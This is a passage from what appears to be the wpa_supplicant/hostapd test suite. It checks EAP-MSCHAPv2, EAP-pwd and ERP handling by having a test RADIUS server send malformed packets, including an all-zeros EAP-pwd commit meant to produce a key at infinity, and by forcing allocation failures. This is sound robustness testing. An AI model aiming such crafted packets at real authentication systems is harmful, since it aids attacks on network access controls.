EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - authentication failure")
payload = 'E=691 R=1 C=00112233445566778899aabbccddeeff V=3 M=Authentication failed'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6, 16) + 16*'A' + 'foobar'
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure - authentication failure")
payload = 'E=691 R=1 C=00112233445566778899aabbccddeeff V=3 M=Authentication failed (2)'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Failure")
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Challenge - invalid ms_len and workaround disabled")
return struct.pack(">BBHBBBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + 1 + 16 + 6,
EAP_TYPE_MSCHAPV2,
1, 0, 4 + 1 + 16 + 6 + 1, 16) + 16*'A' + 'foobar'
return None
srv = start_radius_server(mschapv2_handler)
try:
hapd = start_ap(apdev[0])
for i in range(0, 16):
logger.info("RUN: %d" % i)
if i == 12:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
elif i == 14:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
phase2="mschapv2_retry=0",
password="password", wait_connect=False)
elif i == 15:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
eap_workaround="0",
password="password", wait_connect=False)
else:
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
if i in [ 8, 11, 12 ]:
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"],
timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
if i in [ 11, 12 ]:
ev = dev[0].wait_event(["CTRL-EVENT-PASSWORD-CHANGED"],
timeout=10)
if ev is None:
raise Exception("Timeout on password change")
ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP success")
else:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
if i in [ 13 ]:
ev = dev[0].wait_event(["CTRL-REQ-IDENTITY"],
timeout=10)
if ev is None:
raise Exception("Timeout on identity request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-IDENTITY-" + id + ":user")
ev = dev[0].wait_event(["CTRL-REQ-PASSWORD"],
timeout=10)
if ev is None:
raise Exception("Timeout on password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-PASSWORD-" + id + ":password")
# TODO: Does this work correctly?
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
if i in [ 4, 5, 6, 7, 14 ]:
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"],
timeout=10)
if ev is None:
raise Exception("Timeout on EAP failure")
else:
time.sleep(0.05)
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
finally:
stop_radius_server(srv)
def test_eap_proto_mschapv2_errors(dev, apdev):
"""EAP-MSCHAPv2 protocol tests (error paths)"""
check_eap_capa(dev[0], "MSCHAPV2")
def mschapv2_fail_password_expired(ctx):
logger.info("Test: Failure before challenge - password expired")
payload = 'E=648 R=1 C=00112233445566778899aabbccddeeff V=3 M=Password expired'
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
4, 0, 4 + len(payload)) + payload
def mschapv2_success_after_password_change(ctx, req=None):
logger.info("Test: Success after password change")
if req is None or len(req) != 591:
payload = "S=1122334455667788990011223344556677889900"
else:
data = req[9:]
enc_pw = data[0:516]
data = data[516:]
enc_hash = data[0:16]
data = data[16:]
peer_challenge = data[0:16]
data = data[16:]
# Reserved
data = data[8:]
nt_response = data[0:24]
data = data[24:]
flags = data
logger.info("enc_hash: " + enc_hash.encode("hex"))
logger.info("peer_challenge: " + peer_challenge.encode("hex"))
logger.info("nt_response: " + nt_response.encode("hex"))
logger.info("flags: " + flags.encode("hex"))
auth_challenge = binascii.unhexlify("00112233445566778899aabbccddeeff")
logger.info("auth_challenge: " + auth_challenge.encode("hex"))
auth_resp = GenerateAuthenticatorResponse("new-pw", nt_response,
peer_challenge,
auth_challenge, "user")
payload = "S=" + auth_resp.encode('hex').upper()
return struct.pack(">BBHBBBH", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + 4 + len(payload),
EAP_TYPE_MSCHAPV2,
3, 0, 4 + len(payload)) + payload
def mschapv2_handler(ctx, req):
logger.info("mschapv2_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
return mschapv2_fail_password_expired(ctx)
idx += 1
if ctx['num'] == idx:
return mschapv2_success_after_password_change(ctx, req)
idx += 1
if ctx['num'] == idx:
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
return None
srv = start_radius_server(mschapv2_handler)
try:
hapd = start_ap(apdev[0])
tests = [ "os_get_random;eap_mschapv2_change_password",
"generate_nt_response;eap_mschapv2_change_password",
"get_master_key;eap_mschapv2_change_password",
"nt_password_hash;eap_mschapv2_change_password",
"old_nt_password_hash_encrypted_with_new_nt_password_hash" ]
for func in tests:
with fail_test(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
tests = [ "encrypt_pw_block_with_password_hash;eap_mschapv2_change_password",
"nt_password_hash;eap_mschapv2_change_password",
"nt_password_hash;eap_mschapv2_success" ]
for func in tests:
with fail_test(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password_hex="hash:8846f7eaee8fb117ad06bdd830b7586c",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
tests = [ "eap_msg_alloc;eap_mschapv2_change_password" ]
for func in tests:
with alloc_fail(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="MSCHAPV2", identity="user",
password="password", wait_connect=False)
ev = dev[0].wait_event(["CTRL-REQ-NEW_PASSWORD"], timeout=10)
if ev is None:
raise Exception("Timeout on new password request")
id = ev.split(':')[0].split('-')[-1]
dev[0].request("CTRL-RSP-NEW_PASSWORD-" + id + ":new-pw")
time.sleep(0.1)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
finally:
stop_radius_server(srv)
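# EAP-pwd (RFC 5931) requests below consist of the standard EAP header
# (code, identifier, length), the EAP-pwd type octet, and a PWD-Exch
# octet: 0x80 = L bit (Total-Length field present), 0x40 = M bit (more
# fragments), low six bits = exchange (1 = id, 2 = commit, 3 = confirm).
# The id exchange payload carries group (19 = NIST P-256), random
# function, PRF, token, and password pre-processing fields.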
def test_eap_proto_pwd(dev, apdev):
"""EAP-pwd protocol tests"""
check_eap_capa(dev[0], "PWD")
global eap_proto_pwd_test_done, eap_proto_pwd_test_wait
eap_proto_pwd_test_done = False
eap_proto_pwd_test_wait = False
def pwd_handler(ctx, req):
logger.info("pwd_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] = ctx['num'] + 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
global eap_proto_pwd_test_wait
eap_proto_pwd_test_wait = False
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing payload")
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
EAP_TYPE_PWD)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing Total-Length field")
payload = struct.pack("B", 0x80)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too large Total-Length")
payload = struct.pack(">BH", 0x80, 65535)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: First fragment")
payload = struct.pack(">BH", 0xc0, 10)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Total-Length value in the second fragment")
payload = struct.pack(">BH", 0x80, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: First and only fragment")
payload = struct.pack(">BH", 0x80, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: First and only fragment with extra data")
payload = struct.pack(">BHB", 0x80, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: First fragment")
payload = struct.pack(">BHB", 0xc0, 2, 1)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Extra data in the second fragment")
payload = struct.pack(">BBB", 0x0, 2, 3)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short id exchange")
payload = struct.pack(">B", 0x01)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported rand func in id exchange")
payload = struct.pack(">BHBBLB", 0x01, 0, 0, 0, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported prf in id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 0, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unsupported password pre-processing technique in id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 255)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected commit exchange")
payload = struct.pack(">B", 0x02)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Commit payload length")
payload = struct.pack(">B", 0x02)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Commit payload with all zeros values --> Shared key at infinity")
payload = struct.pack(">B", 0x02) + 96*'\0'
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Commit payload with valid values")
element = binascii.unhexlify("8dcab2862c5396839a6bac0c689ff03d962863108e7c275bbf1d6eedf634ee832a214db99f0d0a1a6317733eecdd97f0fc4cda19f57e1bb9bb9c8dcf8c60ba6f")
scalar = binascii.unhexlify("450f31e058cf2ac2636a5d6e2b3c70b1fcc301957f0716e77f13aa69f9a2e5bd")
payload = struct.pack(">B", 0x02) + element + scalar
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected Confirm payload length 0")
payload = struct.pack(">B", 0x03)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Valid id exchange")
payload = struct.pack(">BHBBLB", 0x01, 19, 1, 1, 0, 0)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
eap_proto_pwd_test_wait = True
logger.info("Test: Commit payload with valid values")
element = binascii.unhexlify("8dcab2862c5396839a6bac0c689ff03d962863108e7c275bbf1d6eedf634ee832a214db99f0d0a1a6317733eecdd97f0fc4cda19f57e1bb9bb9c8dcf8c60ba6f")
scalar = binascii.unhexlify("450f31e058cf2ac2636a5d6e2b3c70b1fcc301957f0716e77f13aa69f9a2e5bd")
payload = struct.pack(">B", 0x02) + element + scalar
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Confirm payload with incorrect value")
payload = struct.pack(">B", 0x03) + 32*'\0'
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected confirm exchange")
payload = struct.pack(">B", 0x03)
return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
4 + 1 + len(payload), EAP_TYPE_PWD) + payload
logger.info("No more test responses available - test case completed")
global eap_proto_pwd_test_done
eap_proto_pwd_test_done = True
return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
srv = start_radius_server(pwd_handler)
try:
hapd = start_ap(apdev[0])
i = 0
while not eap_proto_pwd_test_done:
i += 1
logger.info("Running connection iteration %d" % i)
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ok = False
for j in range(5):
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STATUS",
"CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=5)
if ev is None:
raise Exception("Timeout on EAP start")
if "CTRL-EVENT-EAP-PROPOSED-METHOD" in ev:
ok = True
break
if "CTRL-EVENT-EAP-STATUS" in ev and "status='completion' parameter='failure'" in ev:
ok = True
break
if not ok:
raise Exception("Expected EAP event not seen")
if eap_proto_pwd_test_wait:
for k in range(10):
time.sleep(0.1)
if not eap_proto_pwd_test_wait:
break
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected(timeout=1)
dev[0].dump_monitor()
finally:
stop_radius_server(srv)
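# EAP-pwd local error cases: alloc_fail()/fail_test() make the named
# allocation or crypto call fail on the selected invocation so each
# internal error path in the id/commit/confirm exchanges gets exercised.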
def test_eap_proto_pwd_errors(dev, apdev):
"""EAP-pwd local error cases"""
check_eap_capa(dev[0], "PWD")
params = hostapd.wpa2_eap_params(ssid="eap-test")
hapd = hostapd.add_ap(apdev[0], params)
for i in range(1, 4):
with alloc_fail(dev[0], i, "eap_pwd_init"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "eap_pwd_get_session_id"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
fragment_size="0",
password="secret password")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
funcs = [ "eap_pwd_getkey", "eap_pwd_get_emsk" ]
for func in funcs:
with alloc_fail(dev[0], 1, func):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user@domain",
password="secret password", erp="1",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_pwd_perform_id_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with alloc_fail(dev[0], 1, "wpabuf_alloc;eap_pwd_perform_id_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 9):
with alloc_fail(dev[0], i, "eap_pwd_perform_commit_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 12):
with alloc_fail(dev[0], i, "eap_pwd_perform_confirm_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
ok = False
for j in range(10):
state = dev[0].request('GET_ALLOC_FAIL')
if state.startswith('0:'):
ok = True
break
time.sleep(0.1)
if not ok:
raise Exception("No allocation failure seen")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 5):
with alloc_fail(dev[0], i, "eap_msg_alloc;=eap_pwd_process"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password", fragment_size="50",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
timeout=15)
if ev is None:
raise Exception("Timeout on EAP start")
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
# No password configured
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=52"],
timeout=15)
if ev is None:
raise Exception("EAP-pwd not started")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
with fail_test(dev[0], 1,
"hash_nt_password_hash;eap_pwd_perform_commit_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd-hash",
password_hex="hash:e3718ece8ab74792cbbfffd316d2d19a",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP-Failure reported")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
params = { "ssid": "eap-test2", "wpa": "2", "wpa_key_mgmt": "WPA-EAP",
"rsn_pairwise": "CCMP", "ieee8021x": "1",
"eap_server": "1", "eap_user_file": "auth_serv/eap_user.conf",
"pwd_group": "19", "fragment_size": "40" }
hostapd.add_ap(apdev[1], params)
with alloc_fail(dev[0], 1, "wpabuf_alloc;=eap_pwd_process"):
dev[0].connect("eap-test2", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd user",
password="secret password",
wait_connect=False)
wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
for i in range(1, 5):
with fail_test(dev[0], i,
"=crypto_ec_point_to_bin;eap_pwd_perform_confirm_exchange"):
dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
eap="PWD", identity="pwd-hash",
password_hex="hash:e3718ece8ab74792cbbfffd316d2d19a",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=10)
if ev is None:
raise Exception("No EAP-Failure reported")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
def test_eap_proto_erp(dev, apdev):
"""ERP protocol tests"""
check_erp_capa(dev[0])
global eap_proto_erp_test_done
eap_proto_erp_test_done = False
def erp_handler(ctx, req):
logger.info("erp_handler - RX " + req.encode("hex"))
if 'num' not in ctx:
ctx['num'] = 0
ctx['num'] += 1
if 'id' not in ctx:
ctx['id'] = 1
ctx['id'] = (ctx['id'] + 1) % 256
idx = 0
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing type")
return struct.pack(">BBH", EAP_CODE_INITIATE, ctx['id'], 4)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Unexpected type")
return struct.pack(">BBHB", EAP_CODE_INITIATE, ctx['id'], 4 + 1,
255)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Missing Reserved field")
return struct.pack(">BBHB", EAP_CODE_INITIATE, ctx['id'], 4 + 1,
EAP_ERP_TYPE_REAUTH_START)
idx += 1
if ctx['num'] == idx:
logger.info("Test: Zero-length TVs/TLVs")
payload = ""
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short TLV")
payload = struct.pack("B", 191)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Truncated TLV")
payload = struct.pack("BB", 191, 1)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Ignored unknown TLV and unknown TV/TLV terminating parsing")
payload = struct.pack("BBB", 191, 0, 192)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: More than one keyName-NAI")
payload = struct.pack("BBBB", EAP_ERP_TLV_KEYNAME_NAI, 0,
EAP_ERP_TLV_KEYNAME_NAI, 0)
return struct.pack(">BBHBB", EAP_CODE_INITIATE, ctx['id'],
4 + 1 + 1 + len(payload),
EAP_ERP_TYPE_REAUTH_START, 0) + payload
idx += 1
if ctx['num'] == idx:
logger.info("Test: Too short TLV keyName-NAI")
payload = struct.pack("B", EAP_ERP_TLV_KEYNAME_NAI)
